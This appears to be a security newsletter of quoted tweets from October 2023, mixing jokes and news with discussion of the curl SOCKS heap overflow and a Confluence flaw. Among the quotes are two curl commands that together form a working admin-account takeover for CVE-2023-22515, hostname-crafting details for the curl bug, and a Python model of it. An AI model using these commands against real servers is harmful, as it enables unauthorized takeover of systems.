the grugq's newsletter

October 12, 2023

starting to think some of these courtroom sketch artists lost money on FTX pic.twitter.com/36hzJkzaqa

— Molly White (@molly0xFFF) October 11, 2023

here I was hoping for the cURL bug to be something useful to upgrade a SSRF to have new superpowers or something similar. 🙃

good luck exploiting this heap overflow on a modern-ish libc in a remote context with valid hostname characters for the trigger

— blasty (@bl4sty) October 11, 2023

Textbook deception. “In calls, Hamas operatives, who talked to each other when tapped by Israeli intelligence agents, also gave the sense that they sought to avoid another war with Israel so soon after a damaging two-week conflict in May 2021” https://t.co/CsvpkEblQd

— Shashank Joshi (@shashj) October 11, 2023

https://securitylab.amnesty.org/latest/2023/10/technical-deep-dive-into-intellexa-alliance-surveillance-products/

Apparently every business, not just mobile games, is supported by whales.

1/ Just caught up with a few investor friends in the consumer space last week about Ozempic and GLP1s

As far as I can tell, everything basically hinges on: how much does it matter that every consumer product in the world depends on a tiny cohort of super consumers?

— Corry Wang (@corry_wang) October 11, 2023


Imagine going on a date with someone holding a fish in their dating profile picture and when you get to the restaurant it’s just a salmon sitting there waiting

— Missy Martinez (@MissyXMartinez) August 11, 2023

https://curlconverter.com/go/

Guide to setting up a hardware hacking lab for noobs by @wrongbaud https://t.co/IqO6XJYW4A

— Dreg (@therealdreg) October 10, 2023

This is the only good idea I’ve seen so far for the curl bug.

"On finding a too long host name, the curl code makes the bad decision to instead switch over to local resolve mode"
👀 curl with TOR de-anonymization potential (e.g., HTTP redirect to long host name)? https://t.co/W18pYGNkPt

— Juliano Rizzo (@julianor) October 11, 2023

CISA issues warning that people are still using Adobe Acrobat Reader! https://t.co/YWjdML4VkJ

— thaddeus e. grugq thegrugq@infosec.exchange (@thegrugq) October 11, 2023

Fair coins tend to land on the same side they started: Evidence from 350,757 flips

It’s about 51%

[2310.04153] Fair coins tend to land on the same side they started: Evidence from 350,757 flips

Many people have flipped coins but few have stopped to ponder the statistical and physical intricacies of the process. In a preregistered study we collected 350,757 coin flips to test the counterintuitive prediction from a physics model of human coin tossing developed by Diaconis, Holmes, and Montgomery (D-H-M; 2007). The model asserts that when people flip an ordinary coin, it tends to land on the same side it started -- D-H-M estimated the probability of a same-side outcome to be about 51%. Ou...


We kinda feared this might be coming https://t.co/g2G9gpKsIX

— Niao Collective (@NiaoCollective) October 11, 2023

Whomst Up Hollabacking They Curls? pic.twitter.com/jam0yl4asx

— @netspooky@haunted.computer (@netspooky) October 11, 2023

PoC for CVE-2023-22515: curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action
(login with adm1n/adm1n)

— Nicolas Krassas (@Dinosn) October 11, 2023

This is not a standalone PoC for this vuln at all. It won't work unless you first flip the setupComplete bool to false via a request like:
curl -vk http://<ip>:<port>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
Source: https://t.co/FvTITdWFC0

— Erik Wynter (@Wynter@infosec.exchange) (@WynterErik) October 11, 2023

curl CVE-2023-38545 can be used to partially control the SOCKS conversation. Given a hostname of:

h + PP + padding

where h is a hostname, PP is a network-order short representing a port, and the total length mod 256 is the length of h, this will result in a connection to h:PP.

— xchg justin,justin (@justinsteven) October 12, 2023

Due to an overflow in the one-byte hostname length field, the client will resolve h and connect to its PP via the proxy. It will send the padding followed by the usual request.

h, PP and padding must be DNS-safe bytes

This could have SSRF or privacy impact perhaps? ¯\_(ツ)_/¯

— xchg justin,justin (@justinsteven) October 12, 2023

Note that the second picture is a listener running on the SOCKS proxy itself, as in this case h == "localhost", which will be taken from the perspective of my SOCKS proxy and which my proxy allows clients to connect to. pic.twitter.com/K5vljZvSbq

— xchg justin,justin (@justinsteven) October 12, 2023
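The length-byte truncation described in the thread above, as an added example (not curl's code, and a simplified model rather than the real heap overflow): a defective SOCKS5 CONNECT builder next to a hardened one that refuses over-long names, plus a proxy-side parser showing what destination the proxy actually sees. All function names and the sample hostname are this example's own.

```python
# Added example, not curl's code: a simplified model of the SOCKS5 CONNECT
# request with a domain-name address (ATYP 0x03) as the thread above describes
# it. The name length is a single byte, so a client that truncates the length
# (modelled here as len(host) & 0xFF) sends a length that no longer covers the
# whole name; the proxy then reads the next two bytes as the port and treats
# whatever follows as the start of the tunnelled stream.
import struct

SOCKS5_VERSION, CMD_CONNECT, ATYP_DOMAIN = 0x05, 0x01, 0x03
HEADER = bytes([SOCKS5_VERSION, CMD_CONNECT, 0x00, ATYP_DOMAIN])


def build_connect_truncated(host: bytes, port: int) -> bytes:
    """Defective client: silently truncates the name length to one byte."""
    return HEADER + bytes([len(host) & 0xFF]) + host + struct.pack("!H", port)


def build_connect_fixed(host: bytes, port: int) -> bytes:
    """Hardened client: SOCKS5 cannot carry a name over 255 bytes, so refuse
    it instead of truncating the length or falling back to local resolution."""
    if len(host) > 255:
        raise ValueError("hostname too long for a SOCKS5 domain address")
    return HEADER + bytes([len(host)]) + host + struct.pack("!H", port)


def rejects_long_name(host: bytes) -> bool:
    """True if the hardened builder refuses the name."""
    try:
        build_connect_fixed(host, 80)
        return False
    except ValueError:
        return True


def proxy_parse_connect(msg: bytes):
    """What the proxy sees: (host, port, bytes it will forward to host:port)."""
    if msg[:4] != HEADER:
        raise ValueError("not a SOCKS5 domain-name CONNECT")
    n = msg[4]
    host = msg[5:5 + n]
    (port,) = struct.unpack("!H", msg[5 + n:7 + n])
    return host, port, msg[7 + n:]


def demo():
    # Constructed name in the shape the thread describes: h + PP + padding,
    # with the total length mod 256 equal to len(h).
    h, pp = b"localhost", struct.pack("!H", 0x4141)   # PP must be DNS-safe bytes
    name = h + pp + b"a" * (256 - len(pp))              # len(name) == len(h) + 256
    msg = build_connect_truncated(name, 80)             # client meant name:80
    return proxy_parse_connect(msg)   # proxy connects to localhost:0x4141 instead
```

The padding and the client's intended port bytes end up in the third element, which the proxy forwards to the unintended destination as the first bytes of the stream.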

On deanonymisation.

I was wondering that. The SOCKS proxy remains responsible for the resolution and connection, so if the proxy is Tor and it’s well behaved there shouldn’t be an impact? I don’t know enough about Tor deanonymisation though. It’s definitely worth considering.

— xchg justin,justin (@justinsteven) October 12, 2023

https://daniel.haxx.se/blog/2023/10/11/how-i-made-a-heap-overflow-in-curl/

Will soon be releasing a tool that will allow you to play with macOS libmalloc allocators. So you can, um, find strange patterns. pic.twitter.com/E1EMrH1t5e

— Josh Pitts (@ausernamedjosh) October 11, 2023

My presentation video in BlackHat Asia 2023. Hope you like it!😄❤️@BlackHatEvents https://t.co/6MoD7H7Dne

— pyn3rd (@pyn3rd) October 9, 2023

⚗️ nord-stream

Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab. https://t.co/dNIM9JMqs1

— Marco Lancini (@lancinimarco) October 11, 2023

https://www.sfgate.com/bayarea/article/bart-seat-slasher-hurwitz-service-systems-inc-14544785.php

New: European standards body that created secret TETRA encryption algorithms used in police/military radios is talking about making new algorithms public, following intense backlash after researchers found severe security flaws in its old secret algorithms https://t.co/YbgJKuLRS5

— Kim Zetter (@KimZetter) October 11, 2023

Caroline Ellison of FTX admits that Sam bribed Chinese officials with $100M to unfreeze their assets, purposely tried to scam Saudi investors in the final days of FTX, intentionally tried to sic regulators on Binance to destroy his competition, and it's only lunchtime.

— Autism Capital 🧩 (@AutismCapital) October 11, 2023
